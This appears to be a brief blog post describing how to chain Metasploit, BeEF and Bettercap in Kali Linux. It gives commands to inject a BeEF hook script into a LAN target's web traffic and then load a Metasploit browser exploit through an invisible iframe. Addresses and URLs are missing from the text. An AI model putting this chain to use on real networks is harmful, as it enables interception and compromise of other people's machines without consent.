MetaSploit, Bettercap, and BeEf

MetaSploit, Bettercap, and BeEf work well together. Below is the basic syntax I used in Kali. It assumes the default gateway is, the Kali host is, and the target is 192.168.100.

Start MetaSploit using msgrpc
msf >load msgrpc ServerHost= Pass=abc123

Start BeEF
root@KALI:~# cd /usr/share/beef-xss
root@KALI:~# ./beef

Copy the hook url from the resulting command output.
(Will look something like this:

Start bettercap with the arguments to point the target machine to BeEF.
root@KALI:~# bettercap -T -T –proxy-module injectjs –js-url

Open up the BeEF Admin URL by browsing to

Assuming a client is hooked, investigate the client to determine likely metasploit options.  Get metasploit. Use the “Create invisible iframe” command to spawn an invisible iframe to the URL of the metasploit exploit.

That’s it.


Leave a Reply

Your email address will not be published. Required fields are marked *